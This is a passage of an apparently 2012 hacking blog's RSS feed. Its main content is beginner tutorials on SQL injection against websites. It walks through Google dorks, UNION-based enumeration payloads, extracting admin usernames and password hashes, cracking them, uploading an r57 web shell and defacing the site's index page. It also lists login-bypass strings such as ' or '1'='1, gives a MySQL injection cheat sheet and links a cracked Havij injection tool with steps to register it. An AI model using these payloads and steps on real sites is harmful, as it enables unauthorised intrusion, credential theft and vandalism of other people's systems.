&lt;a href="http://www.mediafire.com/?0a4aw2gmeohndny"&gt;&lt;b style="color: red;"&gt;Download Admin Finder&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Vulnerable Scanner:&lt;/b&gt;&lt;br /&gt;
&lt;a href="http://indicyborg.blogspot.in/2012/08/sql-injection-tool-havij-v115-advanced.html"&gt;&lt;b style="color: red;"&gt;Download ADVANCED HAVIJ Scanner&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Dorks for Finding Vulnerable sites!:&lt;br /&gt;
Common Dorks&lt;/b&gt;&lt;br /&gt;
&lt;i style="color: blue;"&gt;inurl:members.php?id=&lt;br /&gt;
inurl:page.php?id=&lt;br /&gt;
inurl:login.php?id=&lt;br /&gt;
inurl:index.php?id=&lt;br /&gt;
inurl:register.php?id=&lt;br /&gt;
inurl:staff.php?id=&lt;br /&gt;
inurl:detail.php?id=&lt;br /&gt;
inurl:view.php?id=&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;MD5 Hash Crackers Online:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;i style="color: blue;"&gt;http://www.md5crack.com&lt;br /&gt;
http://www.md5decrypter.com&lt;br /&gt;
http://www.md5decrypter.co.uk&lt;br /&gt;
http://md5.rednoize.com&lt;br /&gt;
http://md5decryption.com&lt;br /&gt;
http://www.md5decrypter.com&lt;br /&gt;
http://passcracking.com&lt;br /&gt;
http://md5.my-addr.com/md5_decrypt-md5_c…r_tool.php&lt;br /&gt;
http://www.xmd5.org&lt;br /&gt;
http://www.md5cracker.com/index.php&lt;br /&gt;
http://md5.noisette.ch/index.php&lt;br /&gt;
http://md5cracker.org&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Text to ASCII Converter:&lt;/b&gt;&lt;br /&gt;
&lt;i style="color: blue;"&gt;&lt;br /&gt;
http://www.mikezilla.com/exp0012.html?ascii=login&amp;amp;hex=%2578&amp;amp;unicode=%26%23120;&lt;br /&gt;
http://getyourwebsitehere.com/jswb/text_to_ascii.html&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Shell:&lt;/b&gt;&lt;br /&gt;
&lt;i&gt;&lt;span style="color: blue;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;span style="color: blue;"&gt;http://www.kinginfet.net/shells/&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Some vulnerable websites&lt;br /&gt;
Starting Tutorial:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;1. First you need to find vulnerable website.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;http://sql-vuln-site.com/index.php?id=15&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;2. Now you need to find columns.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;http://sql-vuln-site.com/index.php?id=15 order by 1-- ( no error )&lt;br /&gt;
http://sql-vuln-site.com/index.php?id=15 order by 2-- ( no error )&lt;br /&gt;
http://sql-vuln-site.com/index.php?id=15 order by 3-- ( no error )&lt;br /&gt;
http://sql-vuln-site.com/index.php?id=15 order by 4-- ( no error )&lt;br /&gt;
http://sql-vuln-site.com/index.php?id=15 order by 5-- ( no error )&lt;br /&gt;
http://sql-vuln-site.com/index.php?id=15 order by 6-- ( error )&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Error’s looks like this:&lt;/b&gt;&lt;br /&gt;
&lt;i style="color: red;"&gt;You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’39′ at line 1&lt;br /&gt;
database query failure- SELECT * FROM texecom_sidemenu WHERE id=’39&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;3. Now Select columns&lt;br /&gt;
Columns is 5&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT 1,2,3,4,5–&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;4. Finding version.&lt;br /&gt;
So if you not go the bold number 1 , 2, 3 , 4 one of them you will try all.&lt;br /&gt;
I choose 1&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT @@version,2,3,4,5–&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;you got the version like this:&lt;/b&gt;&lt;br /&gt;
&lt;b style="color: red;"&gt;5.0.32-Debian_7etch11-log&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;5. Finding Tables&lt;br /&gt;
&lt;span style="color: red;"&gt;http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT table_name,2,3,4,5 from information_schema.tables–&lt;/span&gt;&lt;br /&gt;
And you will got tables like this:&lt;br /&gt;
&lt;span style="color: red;"&gt;PRODUCTS , ADMINS , and others&lt;/span&gt;&lt;br /&gt;
So must be there table by name: &lt;span style="color: red;"&gt;admin , users , user , login , client.&lt;/span&gt;&lt;br /&gt;
&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;6. Finding Columns in the Table ADMINS.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: red;"&gt;http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT column_name,2,3,4,5 from information_schema.columns where table_name=char()–&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
We found ADMINS table now go to ASCII web and convert ADMINS&lt;br /&gt;
You will got this &lt;b&gt;ADMINS&lt;/b&gt;&lt;br /&gt;
Remove &lt;b&gt;&amp;amp;# and replace ; to ,&lt;/b&gt;&lt;br /&gt;
Like this: &lt;b&gt;65,68,77,73,78,83&lt;/b&gt;&lt;br /&gt;
You put t&lt;b&gt;able_name=char(65,68,77,73,78,83)–&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT column_name,2,3,4,5 from information_schema.columns where table_name=char(65,68,77,73,78,83)–&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
And you will got the columns in table &lt;b&gt;ADMINS&lt;/b&gt;&lt;br /&gt;
There need to have columns with names: &lt;b&gt;username &lt;/b&gt;and&lt;b&gt; password&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;7. Getting username and password.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Now we put &lt;b&gt;concat(username,0x3a,password)&lt;/b&gt; and admins&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT concat(username,0x3a,password),2,3,4,5 from admins–&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;( 0x3a is ASCII )&lt;/b&gt;&lt;br /&gt;
8. Finded username and password&lt;br /&gt;
So you found the username and password&lt;br /&gt;
if the password is hash like this: &lt;b style="color: red;"&gt;2510c39011c5be704182423e3a695e91&lt;/b&gt;&lt;br /&gt;
you will need to use &lt;b&gt;MD5 Hash Online Crackers.&lt;/b&gt;&lt;br /&gt;
If password is not hash you are lucky and now you need to&lt;b&gt; find admin panel.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;9. Finding Admin Panel&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Open the&lt;b&gt;&lt;span style="color: red;"&gt; tool &lt;/span&gt;Admin Finder&lt;/b&gt;&lt;br /&gt;
Put the website in the bellow and&lt;b&gt; click Scan.&lt;/b&gt;&lt;br /&gt;
So you found admin panel and it looks like this &lt;b style="color: red;"&gt;http://sql-vuln-site.com/admin/login.php&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
You open website and there have &lt;b&gt;Username: Password:&lt;/b&gt;&lt;br /&gt;
Put username and password what you got.&lt;br /&gt;
Done you login in Admin Panel lets upload shell and deface.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;10. Uploading Shell and Add Deface&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
In Admin Panel you will search categories or anything where you can upload a file or picture.&lt;br /&gt;
When you found, you will download shell from the website who i tell you before start tutorial so you will try to upload your shell like: r57.php when you upload it you will see the link of the upload and open it like this:&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;http://sql-vuln-site.com/upload/r57.php&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
If can’t &lt;b&gt;upload r57.php&lt;/b&gt; change it to&lt;b&gt; r57.jpg.php&lt;/b&gt; or&lt;b&gt; r57.txt&lt;/b&gt; and try!&lt;br /&gt;
&lt;br /&gt;
You need to make a deface page in html and put in the website&lt;br /&gt;
So you open the shell,you will found a file&lt;b&gt; index.php&lt;/b&gt; and click on it and there you will &lt;b&gt;remove the php code &lt;/b&gt;from index and put your&lt;b&gt; html code.&lt;/b&gt;&lt;br /&gt;
&lt;b style="color: red;"&gt;&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b style="color: red;"&gt;Congratulations you deface the website.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Thanks For Reading..&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;b&gt;Keep Visiting :-&lt;a href="http://indicyborg.blogspot.in/"&gt;&lt;span style="color: red;"&gt; Indicyborg&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJGbJ-B8lggf68aNOqfLI9mSFye3KOcpQzHxUknF7ECUcee2UQkKVDTXJoL44xILg5pDc-8bQw3ZmalazVHu0eNZU8M0TtHXkYJSOZEHCjUfhX6Mqlx6N6GV-Q-j2GwDZEtmXmRsHslw/s72-c/SQL+Injection+And+Defacement+For+Beginners+Complete+Tutorial.gif" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">5</thr:total></item><item><title>SQL Injection Tool Havij v1.15 Advanced SQL Injection</title><link>http://indicyborg.blogspot.com/2012/08/sql-injection-tool-havij-v115-advanced.html</link><category>Download</category><category>Hacking</category><category>Software</category><category>Sql Injection</category><author>noreply@blogger.com (Akshay)</author><pubDate>Sat, 25 Aug 2012 05:29:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1305573116189186826.post-4019275705513172028</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimPlmBSlJIdIMP-uVa73eD1Iziwo9iFx4eFJdPxgDcMXTL45RTXdgFXm3znELZQnLICBWOqXRjJvHeV5r9FK1n5tFdy6R5eQDGYv49vnLSCj6bBwlSVp9T_XqN2gkyCmLKzOVFHqt23Q/s1600/havij.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="443" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimPlmBSlJIdIMP-uVa73eD1Iziwo9iFx4eFJdPxgDcMXTL45RTXdgFXm3znELZQnLICBWOqXRjJvHeV5r9FK1n5tFdy6R5eQDGYv49vnLSCj6bBwlSVp9T_XqN2gkyCmLKzOVFHqt23Q/s640/havij.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Today i am posting one of the &lt;b&gt;best sql injection tool know as Havij&lt;/b&gt;...&lt;br /&gt;
&lt;b&gt;Havij is an automated SQL Injection&lt;/b&gt; tool that helps penetration testers to find and exploit &lt;b&gt;SQL Injection vulnerabilities on a web page.&lt;/b&gt;&lt;br /&gt;
The power of Havij that makes it different from similar tools is its injection methods.&lt;br /&gt;
The success rate is more than&lt;b style="color: red;"&gt; 95% at injectiong vulnerable targets using Havij.&lt;/b&gt;&lt;br /&gt;
The user friendly &lt;b style="color: red;"&gt;GUI (Graphical User Interface)&lt;/b&gt; of Havij and automated settings and detections makes it easy to use for everyone even amateur users.&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;a href="http://www.blogger.com/goog_1321049178"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/a&gt;&lt;/div&gt;&lt;a href="http://www.itsecteam.com/products/havij-v116-advanced-sql-injection/index.html"&gt;&lt;b style="color: red;"&gt;Download It&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;b&gt;To download&lt;br /&gt;
Cracked Versions :&lt;a href="http://www.ziddu.com/download/17834710/H1.15.rar.html"&gt;&lt;span style="color: red;"&gt;&amp;nbsp; Click Here&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;Steps to register&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;
&lt;b&gt;1.&lt;/b&gt;Run Havij.exe&lt;br /&gt;
&lt;b&gt;2. &lt;/b&gt;Once it opens you will see register..&lt;br /&gt;
3. Click Register&lt;br /&gt;
&lt;b style="color: red;"&gt;Make sure you are connected to the internet&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;4.&lt;/b&gt; Under Name:&lt;br /&gt;
&lt;b style="color: red;"&gt;You write: Cracked@By.Exidous&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;5. &lt;/b&gt;Under File:&lt;br /&gt;
&lt;b style="color: red;"&gt;You select the folder where you are currently running the Havij program from and select Havij Key&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;6. &lt;/b&gt;Done....&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Thanks For Reading.&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;b&gt;Keep Visitng :- &lt;a href="http://www.indicyorg.blogspot.in/"&gt;&lt;span style="color: red;"&gt;Indicyborg&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimPlmBSlJIdIMP-uVa73eD1Iziwo9iFx4eFJdPxgDcMXTL45RTXdgFXm3znELZQnLICBWOqXRjJvHeV5r9FK1n5tFdy6R5eQDGYv49vnLSCj6bBwlSVp9T_XqN2gkyCmLKzOVFHqt23Q/s72-c/havij.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></item><item><title>MySQL Cheat Sheet </title><link>http://indicyborg.blogspot.com/2012/08/mysql-cheat-sheet.html</link><category>Sql Injection</category><author>noreply@blogger.com (Akshay)</author><pubDate>Fri, 24 Aug 2012 05:39:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1305573116189186826.post-7399296212287474722</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivWIEvznZFCCg-G5srPX20NNnnm_GwENkuYLdR4Y2OV8QthPxh6GNAfGYnpRkAoMjUEP9AsEc-j4jZpCYYQ32Fwb9bLCbiC3Cxpzv8YOSaxi0SGSLzRDs_e8r6dtR_VVpSHVJjOo4whQ/s1600/mysqlcheatsheet.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="332" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivWIEvznZFCCg-G5srPX20NNnnm_GwENkuYLdR4Y2OV8QthPxh6GNAfGYnpRkAoMjUEP9AsEc-j4jZpCYYQ32Fwb9bLCbiC3Cxpzv8YOSaxi0SGSLzRDs_e8r6dtR_VVpSHVJjOo4whQ/s640/mysqlcheatsheet.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Hello friends today i am going to start a thread which teaches you about some useful syntax, functions, and queries for MySQL which can MySQL injection attack on websites over a period of time part by part. &lt;b&gt;Here are some in part 1 as follow:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Users:&lt;/b&gt;&lt;br /&gt;
SELECT USER()&lt;br /&gt;
SELECT SYSTEM_USER()&lt;br /&gt;
SELECT SESSION_USER()&lt;br /&gt;
SELECT CURRENT_USER()&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Version:&lt;/b&gt;&lt;br /&gt;
SELECT VERSION()&lt;br /&gt;
SELECT @@version&lt;br /&gt;
SELECT @@version_comment&lt;br /&gt;
SELECT @@version_compile_machine&lt;br /&gt;
SELECT @@version_compile_os&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Directories:&lt;/b&gt;&lt;br /&gt;
SELECT @@basedir&lt;br /&gt;
SELECT @@tmpdir&lt;br /&gt;
SELECT @@datadir&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Current Database:&lt;/b&gt;&lt;br /&gt;
SELECT DATABASE()&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Concatenation:&lt;/b&gt;&lt;br /&gt;
SELECT CONCAT('foo','.','bar'); #Returns: foo.bar&lt;br /&gt;
SELECT CONCAT_WS(' ','Hello','MySQL','and','hello','world!'); #Returns: Hello MySQL and hello world!&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Multi-Concat:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
#Stacks the row "foo" from the table "bar" together, using the separator "&lt;br /&gt;
".&lt;br /&gt;
#Note: This operation can by default only grab 1024 bytes, and do not allow LIMIT.&lt;br /&gt;
#The 1024 byte limit is stored in the @@group_concat_max_len variable.&lt;br /&gt;
&lt;br /&gt;
SELECT GROUP_CONCAT(foo SEPARATOR '&lt;br /&gt;
') FROM bar&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Thanks For Visiting &lt;a href="http://www.indicyborg.blogspot.in/" style="color: red;"&gt;Indicyborg&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivWIEvznZFCCg-G5srPX20NNnnm_GwENkuYLdR4Y2OV8QthPxh6GNAfGYnpRkAoMjUEP9AsEc-j4jZpCYYQ32Fwb9bLCbiC3Cxpzv8YOSaxi0SGSLzRDs_e8r6dtR_VVpSHVJjOo4whQ/s72-c/mysqlcheatsheet.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></item><item><title>How To Hack Using Sqli Sql Injection + Sql Injection Complete Tut</title><link>http://indicyborg.blogspot.com/2012/08/how-to-hack-using-sqli-sql-injection.html</link><category>Hacking</category><category>Sql Injection</category><category>Website Hacking</category><author>noreply@blogger.com (Akshay)</author><pubDate>Thu, 23 Aug 2012 11:23:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1305573116189186826.post-7641204004395654515</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4A9gdFEZv6AD56JzcxcjucL4CoFdkC2gs-7gm1cX1UyHpXhbKmAI07lOyUpzYO4jWwC44b8ew6yBzImHLMwO8NrCXjrkHpC4d_4NncswRpZthqXTCvJVMEti6rLH4_MWLzEZdVzFdEg/s1600/sql-injection.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4A9gdFEZv6AD56JzcxcjucL4CoFdkC2gs-7gm1cX1UyHpXhbKmAI07lOyUpzYO4jWwC44b8ew6yBzImHLMwO8NrCXjrkHpC4d_4NncswRpZthqXTCvJVMEti6rLH4_MWLzEZdVzFdEg/s400/sql-injection.jpg" width="390" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Yestarday i have posted on article on &lt;a href="http://indicyborg.blogspot.in/2012/08/blind-sqli-tutorial-to-hack-website.html"&gt;&lt;b style="color: red;"&gt;BLIND SQLI TO HACK WEBSITE&lt;/b&gt;&lt;/a&gt; Today i am posting basic of hacking that is sqlinjection &lt;br /&gt;
&lt;br /&gt;
As we all know A large number of websites are vulnerable to SQL injection attacks these days.Here i am going to discuss what is &lt;b&gt;SQL injection&lt;/b&gt; and how it is done to &lt;b&gt;hack any website&lt;/b&gt;. Now-a-days, many noobs find an SQL error in database by automated scanners and just exploit it for fun.Even i haven't used my skills for any bad purpose. This post is about those people who don't know that their website is actually vulnerable to such attack, also i am going to tell you that how its done and how to catch this vulnerability.Due to such vulnerability a Hacker can gain access to your website within a minute.&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;What is SQL Injection Actually?&lt;/b&gt;&lt;br /&gt;
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.&lt;br /&gt;
In simple words I must say that hacker injects certain characters in the admin authentication area and gains access as admin.&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;How is basic SQL injection Accomplished?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Google&lt;/b&gt; is very helping in hacking, due to dork technique, Now you will think that what is dork?&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Dork: &lt;/b&gt;A search enquiry to find a website specific to an attack type etc.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;A few dorks are below, which are used to find, vulnerable site:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;"inurl:admin.asp"&lt;/b&gt;&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;b&gt;"inurl:login/admin.asp"&lt;/b&gt;&lt;/div&gt;&lt;b style="color: red;"&gt;"inurl:admin/login.asp"&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
These dorks are pasted in the search bar of &lt;a href="http://google.com/"&gt;&lt;b&gt;google.com&lt;/b&gt;&lt;/a&gt;. and then searched to&lt;b&gt; find the website.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
After finding the required target, injection is accomplished, like in the login fields of &lt;b&gt;admin, as password &lt;/b&gt;following injections are inserted:&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;b&gt;'1'='1' or'1'&lt;span style="color: red;"&gt;(works on 99% of sites best one by me)&lt;/span&gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; ' or '1'='1&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; ' or 'x'='x&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhL52kG8UEwu4RTG4LzdCYD3Rl3e0c2lUCM4RSKQEe5Y8pmgOa_NmaYATprW7b5K53vZN5ZH7q67vVDnQEinO2xQYJy9OA-NLazmacDsAhJ7utKozA6TMm1GuvTeYoJpttsPecyw4kZlA/s1600/sql_injection.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhL52kG8UEwu4RTG4LzdCYD3Rl3e0c2lUCM4RSKQEe5Y8pmgOa_NmaYATprW7b5K53vZN5ZH7q67vVDnQEinO2xQYJy9OA-NLazmacDsAhJ7utKozA6TMm1GuvTeYoJpttsPecyw4kZlA/s400/sql_injection.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;b style="color: red;"&gt;In simple words:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Username : &lt;span style="color: red;"&gt;Admin&lt;/span&gt;&lt;br /&gt;
Password :&lt;span style="color: red;"&gt; 'or'1'='1&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;&lt;span style="color: black;"&gt;Hit login and you are in, All the sites are not vulnerable and this is just for learning purpose,&lt;/span&gt; We are not responsible for any harm or damage caused.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
That was just a&lt;b&gt; simple tutorial &lt;/b&gt;to give you basic information of &lt;a href="http://indicyborg.blogspot.in/search/label/Sql%20Injection"&gt;&lt;b&gt;SQL injection&lt;/b&gt;&lt;/a&gt;. There are more advanced techniques too. But some other day i will discuss.&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;How to check that your website is vulnerable?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;This is the most important part in hacking.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Well then, After reading the basics above you might have got the concept of &lt;a href="http://indicyborg.blogspot.in/search/label/Sql%20Injection"&gt;&lt;b style="color: red;"&gt;SQL injection&lt;/b&gt;&lt;/a&gt;. But many tools are also available to scan your website or server for such errors in database, Note, When error occurs it means that website is vulnerable.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;First Method:&lt;br /&gt;
&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Here is an online scanner:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;b style="color: red;"&gt;http://webhosting.blackoutaio.com/~sqli/&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
For example, If you want to scan, &lt;b style="color: red;"&gt;www.website-wamiq.com&lt;/b&gt; then put this in scanner bar:&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&lt;b style="color: red;"&gt;&amp;nbsp;&amp;nbsp; inurl:php?=id+site:website-wamiq.com&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;If you get:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;b&gt;http://www.website-wamiq.com/product.php?id='3 &amp;lt;== Success &lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Then it means that &lt;b&gt;website is vulnerable&lt;/b&gt; and can be &lt;b&gt;exploited easily&lt;/b&gt; by getting the number of colums.&lt;br /&gt;
&lt;b&gt;(Note: catid, data, num is also used in addition to id. Simply replace id with your desired value in the dork of scanner.)&lt;/b&gt;&lt;br /&gt;
Here i got screen shot of a Website with dork &lt;b style="color: red;"&gt;"data" instead of "id"&lt;/b&gt; vulnerable to the attack it has scanned it overall and here are results:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghq-vPb6YPGjbPoRJsaXXtvDUQVmDmSgtSMk2syZUY1KQ53xP7ZdTInhGMEgZqGIICyHFaoKJTfL_-SOA-_CXrjfW3ZAal7J9w7Oz8hQ7Qse3jAFJWttQjAkZZuGwTfBNcangl1kisnA/s1600/Vulnerable-SQLGov.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghq-vPb6YPGjbPoRJsaXXtvDUQVmDmSgtSMk2syZUY1KQ53xP7ZdTInhGMEgZqGIICyHFaoKJTfL_-SOA-_CXrjfW3ZAal7J9w7Oz8hQ7Qse3jAFJWttQjAkZZuGwTfBNcangl1kisnA/s640/Vulnerable-SQLGov.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;b style="color: red;"&gt;Second Method:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Here is an automated scanner, Which is for newbies, Just click scan and take rest.&lt;br /&gt;
Go to this&lt;a href="http://www.acunetix.com/websitesecurity/sql-injection2.htm"&gt;&lt;b style="color: red;"&gt; link&lt;/b&gt;&lt;/a&gt; to get detailed information on how to find SQL vulnerability in website.&lt;br /&gt;
To get Acunetix vulnerability scanner Trial version go&lt;a href="http://www.acunetix.com/vulnerability-scanner/download.htm"&gt;&lt;b style="color: red;"&gt; here&lt;/b&gt;&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Hope, Now you might be aware of &lt;a href="http://indicyborg.blogspot.in/search/label/Sql%20Injection"&gt;&lt;span style="color: red;"&gt;SQL injections&lt;/span&gt;&lt;/a&gt;. Futher information will be posted later.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
